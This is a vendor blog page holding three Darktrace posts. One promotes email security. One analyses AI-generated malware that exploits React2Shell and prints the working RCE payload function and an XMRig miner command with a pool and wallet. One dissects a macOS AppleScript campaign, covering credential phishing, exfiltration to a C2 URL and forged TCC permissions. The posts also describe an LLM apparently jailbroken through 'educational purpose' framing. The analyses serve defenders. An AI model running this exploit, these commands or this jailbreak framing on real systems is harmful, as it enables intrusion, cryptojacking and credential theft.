April 10, 2023

Employee-Conscious Email Security Solutions in the Workforce

Email threats commonly affect organizations. Read Darktrace's expert insights on how to safeguard your business by educating employees about email security.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product
Written by
Carlos Gray
Senior Product Marketing Manager, Email

When considering email security, IT teams have historically had to choose between excluding employees entirely, or including them but giving them too much power and implementing unenforceable, trust-based policies that try to make up for it. 

However, just because email security should not rely on employees, this does not mean they should be excluded entirely. Employees are the ones interacting with emails daily, and their experiences and behaviors can provide valuable security insights and even influence productivity. 

AI technology can engage employees in a non-intrusive, nuanced way that not only maintains email security, but enhances it. 

Finding a Balance of Employee Involvement in Security Strategies

Historically, security solutions offered ‘all or nothing’ approaches to employee engagement. On one hand, when employees are heavily involved, they become an unreliable link: they cannot all be security experts on top of their actual job responsibilities, and mistakes are bound to happen in fast-paced environments.  

Although there have been attempts to raise security awareness, they often fall short: training emails lack context and realism, leaving employees with a poor understanding that leads them to report emails that are actually safe. Having users constantly triage their inboxes and report safe emails wastes time and takes away from their own productivity as well as that of the security team.

Other historic forms of employee involvement also put security at risk. For example, users could create blanket rules through feedback, which could lead to common problems like safe-listing every email that comes from the gmail.com domain. Other times, employees could choose for themselves to release emails without context or limitations, introducing major risks to the organization. While these types of actions allow employees to participate in security, they do so at the cost of security itself. 

Even lower stakes employee involvement can prove ineffective. For example, excessive warnings when sending emails to external contacts can lead to banner fatigue. When employees see the same warning message or alert at the top of every message, it’s human nature that they soon become accustomed and ultimately immune to it.

On the other hand, when employees are fully excluded from security, an opportunity is missed to fine-tune security according to the actual users and to gain feedback on how well the email security solution is working. 

Both of these historically conventional options for email security, including or excluding employees, prove incapable of leveraging employees effectively. The best email security practice strikes a balance between the two extremes, allowing more nuanced interactions that maintain security without interrupting daily business operations. This can be achieved with AI that tailors interactions specifically to each employee, adding to security instead of detracting from it. 

Reducing False Reports While Improving Security Awareness Training 

Humans and AI-powered email security can simultaneously level up by working together. AI can inform employees and employees can inform AI in an employee-AI feedback loop.  

By understanding ‘normal’ behavior for every email user, AI can identify unusual, risky components of an email and take precise action based on the nature of the email to neutralize them, such as rewriting links, flattening attachments, and moving emails to junk. AI can go one step further and explain in non-technical language why it has taken a specific action, which educates users. In contrast to point-in-time simulated phishing email campaigns, this means AI can share its analysis in context and in real time at the moment a user is questioning an email. 

The employee-AI feedback loop educates employees so that they can serve as an additional source of enrichment data. It determines the appropriate level at which to inform and teach users, while not relying on them for threat detection.

In the other direction, the AI learns from users’ activity in the inbox and gradually factors this into its decision-making. This is not a ‘one size fits all’ mechanism – one employee marking an email as safe will never result in blanket approval across the business – but over time, patterns can be observed and autonomous decision-making enhanced.  

Figure 1: The employee-AI feedback loop increases employee understanding without putting security at risk.

The employee-AI feedback loop draws out the maximum potential benefits of employee involvement in email security. Other email security solutions only consider the security team, enhancing its workflow but never considering the employees that report suspicious emails. Employees who try to do the right thing but blindly report emails never learn or improve and end up wasting their own time. By considering employees and improving security awareness training, the employee-AI feedback loop can level up users. They learn from the AI explanations how to identify malicious components, and so then report fewer emails but with greater accuracy. 

While AI programs have classically acted like black boxes, Darktrace trains its AI on the best data, the organization’s actual employees, and invites both the security team and employees to see the reasoning behind its conclusions. Over time, employees will trust themselves more as they better learn how to discern unsafe emails. 

Leveraging AI to Generate Productivity Gains

Uniquely, AI-powered email security can have effects outside of security-related areas. It can save time by managing non-productive email. As the AI constantly learns employee behavior in the inbox, it becomes extremely effective at detecting spam and graymail – emails that aren't necessarily malicious, but clutter inboxes and hamper productivity. It does this on a per-user basis, specific to how each employee treats spam, graymail, and newsletters. The AI learns to detect this clutter and eventually learns which to pull from the inbox, saving time for the employees. This highlights how security solutions can go even further than merely protecting the email environment with a light touch, to the point where AI can promote productivity gains by automating tasks like inbox sorting.

Preventing Email Mishaps: How to Deal with Human Error

Improved user understanding and decision making cannot stop natural human error. Employees are bound to make mistakes and can easily send emails to the wrong people, especially when Outlook auto-fills the wrong recipient. This can have effects ranging anywhere from embarrassing to critical, with major implications on compliance, customer trust, confidential intellectual property, and data loss. 

However, AI can help reduce instances of accidentally sending emails to the wrong people. When a user goes to send an email in Outlook, the AI will analyze the recipients. It considers the contextual relationship between the sender and recipients, the relationships the recipients have with each other, how similar each recipient’s name and history is to other known contacts, and the names of attached files.  

If the AI determines that the email is outside of a user’s typical behavior, it may alert the user. Security teams can customize what the AI does next: it can block the email, block the email but allow the user to override it, or do nothing but invite the user to think twice. Since the AI analyzes each email, these alerts are more effective than consistent, blanket alerts warning about external recipients, which often go ignored. With this targeted approach, the AI prevents data leakage and reduces cyber risk. 
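To make this concrete, a drastically simplified version of such a recipient check might look like the toy sketch below. This is not Darktrace's algorithm; it only illustrates two of the signals named above, whether a recipient has been seen before and whether the address closely resembles a known contact (a likely auto-fill or typo mistake), using Python's standard difflib. The contact list and threshold are hypothetical.

from difflib import SequenceMatcher

# Hypothetical history of recipients this sender normally emails
KNOWN_CONTACTS = {"anna.lee@partnerco.com", "finance@example-corp.com", "j.smith@example-corp.com"}

def recipient_risk(recipient: str, known_contacts: set[str]) -> str:
    """Toy heuristic: flag unseen recipients that closely resemble a known contact."""
    if recipient in known_contacts:
        return "normal"
    # Find the closest known contact by simple string similarity
    closest = max(known_contacts, key=lambda c: SequenceMatcher(None, recipient, c).ratio())
    similarity = SequenceMatcher(None, recipient, closest).ratio()
    if similarity > 0.85:
        return f"possible misdirection (did you mean {closest}?)"
    return "new recipient - review before sending"

# An 'rn'-for-'m' lookalike address is enough to trigger the warning
print(recipient_risk("j.smith@exarnple-corp.com", KNOWN_CONTACTS))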

Since the AI is always on and continuously learning, it can adapt autonomously to employee changes. If the role of an employee evolves, the AI will learn the new normal, including common behaviors, recipients, attached file names, and more. This allows the AI to continue effectively flagging potential instances of human error, without needing manual rule changes or disrupting the employee’s workflow. 

Email Security Informed by Employee Experience

As the practical users of email, employees should be considered when designing email security. This employee-conscious lens to security can strengthen defenses, improve productivity, and prevent data loss.  

In these ways, email security can benefit both employees and security teams. Employees can become another layer of defense with improved security awareness training that cuts down on false reports of safe emails. This insight into employee email behavior can also enhance employee productivity by learning and sorting graymail. Finally, viewing security in relation to employees can help security teams deploy tools that reduce data loss by flagging misdirected emails. With these capabilities, Darktrace/Email™ enables security teams to optimize the balance of employee involvement in email security.


February 12, 2026

React2Shell Exploitation Using AI/LLM-Generated Malware


Introduction

To observe adversary behavior in real time, Darktrace operates a global honeypot network called “CloudyPots”. CloudyPots is designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insight into the techniques, tools, and malware of threats targeting internet-facing infrastructure.

A recently observed intrusion into Darktrace's CloudyPots environment revealed fully AI-generated malware exploiting the React2Shell vulnerability. As AI-assisted software development (also known as “vibecoding”) becomes widespread, attackers are increasingly using large language models to build tooling quickly. This incident marks a significant shift: with AI, even low-skilled operators can now produce effective exploitation frameworks in a short amount of time. This blog walks through the attack chain, analyzes the AI-generated payload, and discusses what this shift means for defenders.

Initial Access

The intrusion was observed against one of Darktrace's Docker honeypots, which deliberately exposes the Docker daemon to the internet without authentication. This configuration allows any attacker to discover the daemon and create containers through the Docker API. 

The attacker spawned a container named “python-metrics-collector”, configured with a startup command that first installed the required tools, including curl, wget, and Python 3.

Figure 1: Container spawned with the name ‘python-metrics-collector’.

Next, it downloads a set of required Python packages from:

  • hxxps://pastebin[.]com/raw/Cce6tjHM

Finally, it downloads and executes a Python script from:

  • hxxps://smplu[.]link/dockerzero

This link redirects to a GitHub Gist hosted by “hackedyoulol”, an account that had been suspended by GitHub at the time of writing.

  • hxxps://gist.githubusercontent[.]com/hackedyoulol/141b28863cf639c0a0dd563344101f24/raw/07ddc6bb5edac4e9fe5be96e7ab60eda0f9376c3/gistfile1.txt

Notably, despite being malware aimed at Docker, the script did not contain a Docker spreader. This strongly suggests that propagation is handled separately by a centrally managed spreader server.
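Defenders can check their own estate for the kind of exposure that enabled this intrusion. The minimal sketch below probes a Docker daemon over its HTTP API and lists container names for review; it uses the standard Docker Engine API endpoints (GET /version and GET /containers/json), while the target host, the conventional unencrypted port 2375, and the idea of eyeballing names like ‘python-metrics-collector’ are illustrative assumptions rather than Darktrace tooling.

import requests

DOCKER_HOST = "203.0.113.10"   # hypothetical host being audited
DOCKER_PORT = 2375             # conventional unencrypted Docker API port

def check_exposed_docker(host, port, timeout=5):
    base = f"http://{host}:{port}"
    try:
        version = requests.get(f"{base}/version", timeout=timeout).json()
    except requests.RequestException:
        return None  # daemon is not reachable without authentication
    # If /version answers, the API is open; list every container for review
    containers = requests.get(f"{base}/containers/json", params={"all": 1}, timeout=timeout).json()
    names = [name.lstrip("/") for c in containers for name in c.get("Names", [])]
    return {"docker_version": version.get("Version"), "containers": names}

result = check_exposed_docker(DOCKER_HOST, DOCKER_PORT)
if result:
    print("Docker API reachable without authentication:", result)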

Deployed Components and Execution Chain

The downloaded Python payload was the central execution component of the intrusion. The design of the malware itself reinforces the separation between the exploit script and the spreading mechanism. Because Docker malware usually contains its own spreader logic, the absence of one here suggests that the attacker manages and runs a dedicated spreading tool remotely.

The script begins with a multi-line comment:
"""
   Network Scanner with Exploitation Framework
   Educational/Research Purpose Only
   Docker-compatible: No external dependencies except requests
"""

This is telling in itself. Most of the samples we analyze do not contain this level of commenting; in many cases they are deliberately written to be difficult to understand in order to hinder analysis. Scripts written quickly by human operators tend to prioritize speed and functionality over readability. LLMs, on the other hand, are designed to comment code in detail, and this pattern appears repeatedly throughout the sample. Furthermore, AI models refuse to generate malware as part of their safeguards.

In addition, the inclusion of the phrase “Educational/Research Purpose Only” suggests that the attacker jailbroke the AI model by framing their malicious requests as being for educational purposes.

Parts of the script were also run through AI-detection software, and the results indicated that the code was most likely generated by an LLM.

Figure 2: GPTZero AI-detection results indicating that the script was likely generated using an AI model.

The script is a well-built React2Shell exploit toolkit that performs remote code execution and attempts to deploy the XMRig (Monero) cryptocurrency mining malware. It finds targets using an IP-generation loop and issues exploit requests containing:

  • A carefully crafted Next.js Server Component payload
  • A chunk designed to force execution and reveal command output
  • A child-process invocation that executes arbitrary shell commands

def execute_rce_command(base_url, command, timeout=120):
    """ACTUAL EXPLOIT METHOD - Next.js React Server Component RCE
    DO NOT MODIFY THIS FUNCTION
    Returns: (success, output)
    """
    try:
        # Disable SSL warnings
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

        crafted_chunk = {
            "then": "$1:__proto__:then",
            "status": "resolved_model",
            "reason": -1,
            "value": '{"then": "$B0"}',
            "_response": {
                "_prefix": f"var res = process.mainModule.require('child_process').execSync('{command}', {{encoding: 'utf8', maxBuffer: 50 * 1024 * 1024, stdio: ['pipe', 'pipe', 'pipe']}}).toString(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
                "_formData": {
                    "get": "$1:constructor:constructor",
                },
            },
        }

        files = {
            "0": (None, json.dumps(crafted_chunk)),
            "1": (None, '"$@0"'),
        }

        headers = {"Next-Action": "x"}

        res = requests.post(base_url, files=files, headers=headers, timeout=timeout, verify=False)

This function is first invoked with ‘whoami’ to determine whether a host is vulnerable. It is then used with wget to download XMRig from a GitHub repository and to launch it with the configured mining pool and wallet address.


WALLET = "45FizYc8eAcMAQetBjVCyeAs8M2ausJpUMLRGCGgLPEuJohTKeamMk6jVFRpX4x2MXHrJxwFdm3iPDufdSRv2agC5XjykhA"
XMRIG_VERSION = "6.21.0"
POOL_PORT_443 = "pool.supportxmr.com:443"
...
print_colored(f"[EXPLOIT] Starting miner on {identifier} (port 443)...", 'cyan')  
miner_cmd = f"nohup xmrig-{XMRIG_VERSION}/xmrig -o {POOL_PORT_443} -u {WALLET} -p {worker_name} --tls -B >/dev/null 2>&1 &"

success, _ = execute_rce_command(base_url, miner_cmd, timeout=10)

What many attackers fail to appreciate is that although Monero uses an opaque blockchain (transactions cannot be traced and wallet balances cannot be viewed), mining pools such as supportxmr publish statistics for each wallet address. This makes it easy to track the success of a campaign and the attacker's profits.

Figure 3: The supportxmr mining pool overview for the attacker's wallet address.

Based on this information, the attacker has earned 0.015 XMR since the campaign began, worth roughly £5 at the time of writing. Per day, the attacker generates 0.004 XMR, worth about £1.33. The worker count is 91, meaning 91 hosts have been infected with this sample.
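As a rough illustration, these figures can be pulled programmatically rather than read off the pool's web page. The sketch below assumes supportxmr exposes a nodejs-pool-style JSON endpoint at /api/miner/<wallet>/stats and that amounts are reported in Monero atomic units (1 XMR = 10^12 units); both the endpoint path and the field names are assumptions based on common pool software, not confirmed API documentation.

import requests

WALLET = "45FizYc8eAcMAQetBjVCyeAs8M2ausJpUMLRGCGgLPEuJohTKeamMk6jVFRpX4x2MXHrJxwFdm3iPDufdSRv2agC5XjykhA"
STATS_URL = f"https://supportxmr.com/api/miner/{WALLET}/stats"  # assumed nodejs-pool-style path
ATOMIC_UNITS_PER_XMR = 10**12  # Monero amounts are commonly reported in atomic units

stats = requests.get(STATS_URL, timeout=10).json()

# "amtPaid" and "amtDue" follow the common nodejs-pool schema; treat them as assumptions
total_xmr = (stats.get("amtPaid", 0) + stats.get("amtDue", 0)) / ATOMIC_UNITS_PER_XMR
print(f"Wallet has earned approximately {total_xmr:.4f} XMR from this pool")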

Conclusion

Although the amount generated by the attacker in this case is relatively small, and cryptocurrency mining is hardly a new technique, the campaign is a concrete example of AI-based LLMs making cybercrime easier. In a single prompting session with a model, this attacker produced a working exploitation framework and compromised more than 90 hosts. It demonstrates that AI-based LLMs have lowered the bar for cybercrime further than ever, and that the operational value of AI to attackers should not be underestimated.

CISOs and SOC leaders should treat this incident as a preview of what is coming. Threat actors can now generate custom malware on demand, modify exploits on the fly, and automate every stage of a compromise. Defenders need to prioritize rapid patching, continuous attack surface monitoring, and behavior-based detection approaches. AI-generated malware is no longer theoretical: it is operational, scalable, and accessible to anyone.

Analyst Comments

It is notable that the downloaded script does not appear to contain a Docker spreader, meaning the malware does not replicate itself from infected hosts to other victims. Compared with other samples analyzed by Darktrace's research team, this is unusual for Docker malware. It indicates that a separate spreading script exists, most likely deployed by the attacker from a central spreader server. This reasoning is supported by the fact that the IP that initiated the connection, 49[.]36.33.11, is registered to a residential ISP in India. The attacker may be hiding their tracks behind a residential proxy, but it is also possible they are running the spreading script from their home computer. This should not, however, be taken as confirmed attribution.

Credit to Nathaniel Bill (Malware Research Engineer) and Nathaniel Jones (VP Threat Research | Field CISO, AI Security)

Indicators of Compromise (IoCs)

Spreader IP - 49[.]36.33.11
Malware host domain - smplu[.]link
Hash - 594ba70692730a7086ca0ce21ef37ebfc0fd1b0920e72ae23eff00935c48f15b
Hash 2 - d57dda6d9f9ab459ef5cc5105551f5c2061979f082e0c662f68e8c4c343d667d


February 9, 2026

AppleScript Abuse: Unpacking a macOS Phishing Campaign


Introduction

Darktrace security researchers have identified a campaign targeting macOS users through a multistage malware campaign that leverages social engineering and attempted abuse of the macOS Transparency, Consent and Control (TCC) privacy feature.

The malware establishes persistence via LaunchAgents and deploys a modular Node.js loader capable of executing binaries delivered from a remote command-and-control (C2) server.

Due to increased built-in security mechanisms in macOS such as System Integrity Protection (SIP) and Gatekeeper, threat actors increasingly rely on alternative techniques, including fake software and ClickFix attacks [1] [2]. As a result, macOS threats rely more heavily on social engineering instead of vulnerability exploitation to deliver payloads, a trend Darktrace has observed across the threat landscape [3].

Technical analysis

The infection chain starts with a phishing email that prompts the user to download an AppleScript file named “Confirmation_Token_Vesting.docx.scpt”, which attempts to masquerade as a legitimate Microsoft document.

Figure 1: The AppleScript header prompting execution of the script.

Once the user opens the AppleScript file, they are presented with a prompt instructing them to run the script, supposedly due to “compatibility issues”. This prompt is necessary because AppleScript requires user interaction to execute the script, preventing it from running automatically. To further conceal its intent, the malicious part of the script is buried below many empty lines, on the assumption that a user is unlikely to scroll to the end of the file where the malicious code is placed.

Figure 2: Curl request to receive the next stage.

This part of the script builds a silent curl request to “sevrrhst[.]com”, sending the user's macOS version, CPU type, and language. This request retrieves another script, which is saved as a hidden file at ~/.ex.scpt, executed, and then deleted.

The retrieved payload is another AppleScript designed to steal credentials and retrieve additional payloads. It begins by loading the AppKit framework, which enables the script to create a fake dialog box prompting the user to enter their system username and password [4].

Figure 3: Fake dialog prompt for system password.

The script then validates the username and password using the command "dscl /Search -authonly <username> <password>", all while displaying a fake progress bar to the user. If validation fails, the dialog window shakes suggesting an incorrect password and prompting the user to try again. The username and password are then encoded in Base64 and sent to: https://sevrrhst[.]com/css/controller.php?req=contact&ac=<user>&qd=<pass>.
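The validation step is straightforward to illustrate: the script simply shells out to dscl and checks the exit code. The minimal Python sketch below reproduces that check (macOS only) and is included purely to show why the fake dialog can tell a wrong password from a correct one; note that, as in the malware, the password ends up on a command line, which is itself an observable artifact in process listings.

import subprocess

def credentials_are_valid(username: str, password: str) -> bool:
    """Return True if dscl accepts the username/password pair (macOS only)."""
    # dscl exits 0 on successful authentication and non-zero otherwise
    result = subprocess.run(
        ["dscl", "/Search", "-authonly", username, password],
        capture_output=True,
        text=True,
    )
    return result.returncode == 0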

Figure 4: Requirements gathered from a trusted binary.

Within the getCSReq() function, the script chooses from trusted Mac applications: Finder, Terminal, Script Editor, osascript, and bash. Using codesign -d --requirements, it extracts the designated code-signing requirement from the target application. If a valid requirement cannot be retrieved, that binary is skipped. Once a designated requirement is gathered, it is compiled into a binary trust object using the Code Signing Requirement command (csreq). This trust object is then converted into hex so it can later be injected into the TCC SQLite database.

To bypass integrity checks, the TCC directory is renamed to com.appled.tcc using Finder. TCC is a macOS privacy framework designed to restrict application access to sensitive data, requiring users to explicitly grant permissions before apps can access items such as files, contacts, and system resources [1].

Figure 5: TCC directory renamed to com.appled.TCC.
Figure 6: Example of how users interact with TCC.

After the database directory rename is attempted, the killall command is used on the tccd daemon to force macOS to release the lock on the database. The database is then injected with the forged access records, including the service, trusted binary path, auth_value, and the forged csreq binary. The directory is renamed back to com.apple.TCC, allowing the injected entries to be read and the permissions to be accepted. This enables persistence authorization for:

  • Full disk access
  • Screen recording
  • Accessibility
  • Camera
  • Apple Events 
  • Input monitoring

The malware does not grant permissions to itself; instead, it forges TCC authorizations for trusted Apple-signed binaries (Terminal, osascript, Script Editor, and bash) and then executes malicious actions through these binaries to inherit their permissions.
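Defenders reviewing a Mac for this kind of tampering can inspect the per-user TCC database directly. The sketch below opens TCC.db read-only with Python's sqlite3 module and prints which clients hold which services, so that broad grants to shell interpreters stand out; note that the database path and the access-table columns (service, client, auth_value) are based on commonly documented schemas that vary across macOS versions, and that reading the database itself requires Full Disk Access.

import os
import sqlite3

# Per-user TCC database; a system-wide copy lives under /Library/Application Support/com.apple.TCC
TCC_DB = os.path.expanduser("~/Library/Application Support/com.apple.TCC/TCC.db")

# Open read-only so the audit itself never touches TCC state
conn = sqlite3.connect(f"file:{TCC_DB}?mode=ro", uri=True)

# Column names follow commonly documented schemas and may differ by macOS version
for service, client, auth_value in conn.execute(
    "SELECT service, client, auth_value FROM access ORDER BY service"
):
    # Interpreters such as Terminal, osascript or bash holding broad services
    # (e.g. kTCCServiceSystemPolicyAllFiles) deserve a closer look after an incident
    print(f"{service:45} {client:45} auth_value={auth_value}")

conn.close()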

Although the malware is attempting to manipulate TCC state via Finder, a trusted system component, Apple has introduced updates in recent macOS versions that move much of the authorization enforcement into the tccd daemon. These updates prevent unauthorized permission modifications through directory or database manipulation. As a result, the script may still succeed on some older operating systems, but it is likely to fail on newer installations, as tcc.db reloads now have more integrity checks, and will fail on Mobile Device Management (MDM) systems as their profiles override TCC.

Figure 7: Snippet of decoded Base64 response.

A request is made to the C2, which retrieves and executes a Base64-encoded script. This script retrieves additional payloads based on the system architecture and stores them inside a directory it creates named ~/.nodes. A series of requests are then made to sevrrhst[.]com for:

/controller.php?req=instd

/controller.php?req=tell

/controller.php?req=skip

These return a node archive, a bundled Node.js binary, and a JavaScript payload. The JavaScript file, index.js, is a loader that profiles the system and sends the data to the C2. The script identifies the system platform (macOS, Linux, or Windows) and then gathers the OS version, CPU details, memory usage, disk layout, network interfaces, and running processes. This is sent to https://sevrrhst[.]com/inc/register.php?req=init as a JSON object. The victim system is then registered with the C2 and receives a Base64-encoded response.

Figure 8: LaunchAgent patterns to be replaced with victim information.

The Base64-encoded response decodes to additional JavaScript that is used to set up persistence. The script creates a folder named com.apple.commonjs in ~/Library and copies the Node dependencies into this directory. From the C2, the files package.json and default.js are retrieved and placed into the com.apple.commonjs folder. A LaunchAgent .plist is also downloaded into the LaunchAgents directory to ensure the malware starts automatically. The .plist launches node and default.js on load, and uses output logging to record errors and output.
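A simple way to hunt for this persistence is to enumerate per-user LaunchAgents and flag any .plist whose program arguments reference a Node binary or scripts under ~/Library. The sketch below does this with Python's plistlib; the markers it looks for (node, com.apple.commonjs, default.js) are taken from this campaign and would need adjusting for other intrusions.

import os
import glob
import plistlib

SUSPICIOUS_MARKERS = ("node", "com.apple.commonjs", "default.js")  # indicators from this campaign

agent_dir = os.path.expanduser("~/Library/LaunchAgents")
for plist_path in glob.glob(os.path.join(agent_dir, "*.plist")):
    try:
        with open(plist_path, "rb") as fh:
            agent = plistlib.load(fh)
    except Exception:
        continue  # skip unreadable or malformed plists
    # ProgramArguments holds the command line the agent runs on load
    args = " ".join(agent.get("ProgramArguments", []))
    if any(marker in args for marker in SUSPICIOUS_MARKERS):
        print(f"Suspicious LaunchAgent: {plist_path}\n  launches: {args}")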

Default.js is Base64-encoded JavaScript that functions as a command loop, periodically sending logs to the C2 and checking for new payloads to execute. This gives threat actors ongoing access and the ability to dynamically modify behavior without having to redeploy the malware. A further Base64-encoded JavaScript file is downloaded as addon.js.

Addon.js is used as the final payload loader, retrieving a Base64-encoded binary from https://sevrrhst[.]com/inc/register.php?req=next. The binary is decoded from Base64, written to disk as “node_addon”, and executed silently in the background. At the time of analysis, the C2 did not return a binary, possibly because certain conditions were not met. However, this mechanism enables the delivery and execution of further payloads. If the initial TCC abuse were successful, this payload could access protected resources such as Screen Capture and Camera without triggering a consent prompt, due to the previously established trust.

Conclusion

This campaign shows how a malicious threat actor can use an AppleScript loader to exploit user trust and manipulate TCC authorization mechanisms, achieving persistent access to a target network without exploiting vulnerabilities.

Although recent macOS versions include safeguards against this type of TCC abuse, users should keep their systems fully updated to ensure they have the most up-to-date protections. These findings also highlight the intentions of threat actors when developing malware, even when their implementation is imperfect.

Credit to Tara Gould (Malware Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Indicators of Compromise (IoCs)

88.119.171[.]59

sevrrhst[.]com

https://sevrrhst[.]com/inc/register.php?req=next

https://stomcs[.]com/inc/register.php?req=next
https://techcross-es[.]com

Confirmation_Token_Vesting.docx.scpt - d3539d71a12fe640f3af8d6fb4c680fd

EDD_Questionnaire_Individual_Blank_Form.docx.scpt - 94b7392133935d2034b8169b9ce50764

Investor Profile (Japan-based) - Shiro Arai.pdf.scpt - 319d905b83bf9856b84340493c828a0c

MITRE ATT&CK

T1566 – Phishing

T1059.002 – Command and Scripting Interpreter: AppleScript

T1059.004 – Command and Scripting Interpreter: Unix Shell

T1059.007 – Command and Scripting Interpreter: JavaScript

T1222.002 – File and Directory Permissions Modification

T1036.005 – Masquerading: Match Legitimate Name or Location

T1140 – Deobfuscate/Decode Files or Information

T1547.001 – Boot or Logon Autostart Execution: Launch Agent

T1553.006 – Subvert Trust Controls: Code Signing Policy Modification

T1082 – System Information Discovery

T1057 – Process Discovery

T1105 – Ingress Tool Transfer

References

[1] https://www.darktrace.com/blog/from-the-depths-analyzing-the-cthulhu-stealer-malware-for-macos

[2] https://www.darktrace.com/blog/unpacking-clickfix-darktraces-detection-of-a-prolific-social-engineering-tactic

[3] https://www.darktrace.com/blog/crypto-wallets-continue-to-be-drained-in-elaborate-social-media-scam

[4] https://developer.apple.com/documentation/appkit

[5] https://www.huntress.com/blog/full-transparency-controlling-apples-tcc
